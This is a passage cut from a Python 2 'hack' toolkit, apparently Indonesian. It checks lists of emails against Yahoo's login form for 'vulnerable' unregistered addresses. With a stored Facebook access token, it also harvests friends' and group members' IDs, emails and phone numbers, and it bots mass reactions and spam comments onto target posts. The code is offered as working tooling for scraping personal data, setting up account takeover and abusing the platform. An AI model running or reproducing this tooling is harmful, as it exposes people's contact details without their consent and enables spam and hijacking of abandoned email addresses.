total = open(files, 'r')
mail = total.readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
mpsh = []
jml = 0
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
save = open('MailVuln.txt', 'w')
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;97mStatus \x1b[1;91m: \x1b[1;97mRed[\x1b[1;92m' + vulnot + '\x1b[1;97m] Green[\x1b[1;92m' + vuln + '\x1b[1;97m]'
print
mail = open(files, 'r').readlines()
for pw in mail:
mail = pw.replace('\n', '')
jml += 1
mpsh.append(jml)
yahoo = re.compile('@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open('https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com')
br._factory.is_html = True
br.select_form(nr=0)
br['username'] = mail
klik = br.submit().read()
jok = re.compile('"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
print '\x1b[1;91m ' + mail
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print '\x1b[1;92m ' + mail
else:
print '\x1b[1;91m ' + mail
print '\n\x1b[1;91m[+] \x1b[1;97mFinish'
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m:\x1b[1;97m MailVuln.txt'
save.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_yahoo()
def grab():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Get ID From Friends'
print '║-> \x1b[1;37;40m2. Get Friends ID From Friends'
print '║-> \x1b[1;37;40m3. Get ID From GRUP'
print '║-> \x1b[1;37;40m4. Get Friends Email'
print '║-> \x1b[1;37;40m5. Get Friends Email From Friends'
print '║-> \x1b[1;37;40m6. Get Phone From Friends'
print '║-> \x1b[1;37;40m7. Get Friend\'s Phone From Friends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
grab_pilih()
def grab_pilih():
cuih = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if cuih == '':
print '\x1b[1;91m[!] Can\'t empty'
grab_pilih()
else:
if cuih == '1':
id_friends()
else:
if cuih == '2':
idfrom_friends()
else:
if cuih == '3':
id_member_grup()
else:
if cuih == '4':
email()
else:
if cuih == '5':
emailfrom_friends()
else:
if cuih == '6':
nomor_hp()
else:
if cuih == '7':
hpfrom_friends()
else:
if cuih == '0':
menu_hack()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + cuih + ' \x1b[1;91mnot found'
grab_pilih()
def id_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
z = json.loads(r.text)
save_id = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_id, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['data']:
idfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_id
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except KeyError:
os.remove(save_id)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def idfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
r = requests.get('https://graph.facebook.com/' + idt + '?fields=friends.limit(5000)&access_token=' + toket)
z = json.loads(r.text)
save_idt = raw_input('\x1b[1;91m[+] \x1b[1;92mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
bz = open(save_idt, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for ah in z['friends']['data']:
idfromfriends.append(ah['id'])
bz.write(ah['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + ah['name']
print '\x1b[1;92mID \x1b[1;91m : \x1b[1;97m' + ah['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile Disimpan \x1b[1;91m: \x1b[1;97m' + save_idt
bz.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def id_member_grup():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
id = raw_input('\x1b[1;91m[+] \x1b[1;92mID grup \x1b[1;91m:\x1b[1;97m ')
try:
r = requests.get('https://graph.facebook.com/group/?id=' + id + '&access_token=' + toket)
asw = json.loads(r.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
except KeyError:
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
simg = raw_input('\x1b[1;91m[+] \x1b[1;97mSimpan File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
b = open(simg, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mMohon Tunggu \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
re = requests.get('https://graph.facebook.com/' + id + '/members?fields=name,id&access_token=' + toket)
s = json.loads(re.text)
for i in s['data']:
idmem.append(i['id'])
b.write(i['id'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + i['name']
print '\x1b[1;92mID \x1b[1;91m :\x1b[1;97m ' + i['id']
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal ID \x1b[1;96m%s' % len(idmem)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + simg
b.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(simg)
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def email():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/me/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
em.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(em)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(mails)
print '\x1b[1;91m[!] An error occurred'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def emailfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput ID Friends \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
mails = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
mpsh = open(mails, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
emfromfriends.append(z['email'])
mpsh.write(z['email'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mEmail\x1b[1;91m : \x1b[1;97m' + z['email']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Email\x1b[1;96m%s' % len(emfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + mails
mpsh.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def nomor_hp():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
url = 'https://graph.facebook.com/me/friends?access_token=' + toket
r = requests.get(url)
z = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for n in z['data']:
x = requests.get('https://graph.facebook.com/' + n['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hp.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Phone\x1b[1;96m%s' % len(hp)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except KeyError:
os.remove(noms)
print '\x1b[1;91m[!] An error occurred '
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def hpfrom_friends():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
try:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
idt = raw_input('\x1b[1;91m[+] \x1b[1;92mInput Friends ID \x1b[1;91m: \x1b[1;97m')
try:
jok = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + toket)
op = json.loads(jok.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mFrom\x1b[1;91m :\x1b[1;97m ' + op['name']
except KeyError:
print '\x1b[1;91m[!] Not be friends'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
noms = raw_input('\x1b[1;91m[+] \x1b[1;92mSave File \x1b[1;97mext(file.txt) \x1b[1;91m: \x1b[1;97m')
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + toket)
a = json.loads(r.text)
no = open(noms, 'w')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for i in a['data']:
x = requests.get('https://graph.facebook.com/' + i['id'] + '?access_token=' + toket)
z = json.loads(x.text)
try:
hpfromfriends.append(z['mobile_phone'])
no.write(z['mobile_phone'] + '\n')
print '\r\x1b[1;92mName\x1b[1;91m :\x1b[1;97m ' + z['name']
print '\x1b[1;92mPhone\x1b[1;91m : \x1b[1;97m' + z['mobile_phone']
print 52 * '\x1b[1;97m\xe2\x95\x90'
except KeyError:
pass
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal number\x1b[1;96m%s' % len(hpfromfriends)
print '\x1b[1;91m[+] \x1b[1;97mFile saved \x1b[1;91m: \x1b[1;97m' + noms
no.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except IOError:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
grab()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
def menu_bot():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Bot Reactions Target Post'
print '║-> \x1b[1;37;40m2. Bot Reactions Group Post'
print '║-> \x1b[1;37;40m3. Bot Comment Target Post'
print '║-> \x1b[1;37;40m4. Bot Comment Group Post'
print '║-> \x1b[1;37;40m5. Mass Delete Post'
print '║-> \x1b[1;37;40m6. Accept Friend Requests'
print '║-> \x1b[1;37;40m7. Unfriends'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
bot_pilih()
def bot_pilih():
bots = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if bots == '':
print '\x1b[1;91m[!] Can\'t empty'
bot_pilih()
else:
if bots == '1':
menu_react()
else:
if bots == '2':
grup_react()
else:
if bots == '3':
bot_komen()
else:
if bots == '4':
grup_komen()
else:
if bots == '5':
deletepost()
else:
if bots == '6':
accept()
else:
if bots == '7':
unfriend()
else:
if bots == '0':
menu()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + bots + ' \x1b[1;91mnot found'
bot_pilih()
def menu_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
react_pilih()
def react_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
react_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
react()
else:
if aksi == '2':
tipe = 'LOVE'
react()
else:
if aksi == '3':
tipe = 'WOW'
react()
else:
if aksi == '4':
tipe = 'HAHA'
react()
else:
if aksi == '5':
tipe = 'SAD'
react()
else:
if aksi == '6':
tipe = 'ANGRY'
react()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
react_pilih()
def react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
try:
oh = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksi))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_react():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. \x1b[1;97mLike'
print '║-> \x1b[1;37;40m2. \x1b[1;97mLove'
print '║-> \x1b[1;37;40m3. \x1b[1;97mWow'
print '║-> \x1b[1;37;40m4. \x1b[1;97mHaha'
print '║-> \x1b[1;37;40m5. \x1b[1;97mSad'
print '║-> \x1b[1;37;40m6. \x1b[1;97mAngry'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
reactg_pilih()
def reactg_pilih():
global tipe
aksi = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if aksi == '':
print '\x1b[1;91m[!] Can\'t empty'
reactg_pilih()
else:
if aksi == '1':
tipe = 'LIKE'
reactg()
else:
if aksi == '2':
tipe = 'LOVE'
reactg()
else:
if aksi == '3':
tipe = 'WOW'
reactg()
else:
if aksi == '4':
tipe = 'HAHA'
reactg()
else:
if aksi == '5':
tipe = 'SAD'
reactg()
else:
if aksi == '6':
tipe = 'ANGRY'
reactg()
else:
if aksi == '0':
menu_bot()
else:
print '\x1b[1;91m[\xe2\x9c\x96] \x1b[1;97m' + aksi + ' \x1b[1;91mnot found'
reactg_pilih()
def reactg():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName group \x1b[1;91m:\x1b[1;97m ' + asw['name']
try:
oh = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
ah = json.loads(oh.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post('https://graph.facebook.com/' + y + '/reactions?type=' + tipe + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + y[:10].replace('\n', ' ') + '... \x1b[1;92m] \x1b[1;97m' + tipe
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(reaksigrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def bot_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mUse \x1b[1;97m'<>' \x1b[1;92m for newline"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Target \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
p = requests.get('https://graph.facebook.com/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komen))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def grup_komen():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print "\x1b[1;91m[!] \x1b[1;92mGunakan \x1b[1;97m'<>' \x1b[1;92mUntuk Baris Baru"
ide = raw_input('\x1b[1;91m[+] \x1b[1;92mID Group \x1b[1;91m:\x1b[1;97m ')
km = raw_input('\x1b[1;91m[+] \x1b[1;92mComments \x1b[1;91m:\x1b[1;97m ')
limit = raw_input('\x1b[1;91m[!] \x1b[1;92mLimit \x1b[1;91m:\x1b[1;97m ')
km = km.replace('<>', '\n')
try:
ah = requests.get('https://graph.facebook.com/group/?id=' + ide + '&access_token=' + toket)
asw = json.loads(ah.text)
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName grup \x1b[1;91m:\x1b[1;97m ' + asw['name']
p = requests.get('https://graph.facebook.com/v3.0/' + ide + '?fields=feed.limit(' + limit + ')&access_token=' + toket)
a = json.loads(p.text)
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post('https://graph.facebook.com/' + f + '/comments?message=' + km + '&access_token=' + toket)
print '\x1b[1;92m[\x1b[1;97m' + km[:10].replace('\n', ' ') + '... \x1b[1;92m]'
print
print '\r\x1b[1;91m[+]\x1b[1;97m Finish \x1b[1;96m' + str(len(komengrup))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
except KeyError:
print '\x1b[1;91m[!] ID not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu_bot()
def deletepost():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
nam = requests.get('https://graph.facebook.com/me?access_token=' + toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[+] \x1b[1;92mFrom \x1b[1;91m: \x1b[1;97m%s' % nama
jalan('\x1b[1;91m[+] \x1b[1;92mStarting remove status\x1b[1;97m ...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
asu = requests.get('https://graph.facebook.com/me/feed?access_token=' + toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/' + id + '?method=delete&access_token=' + toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
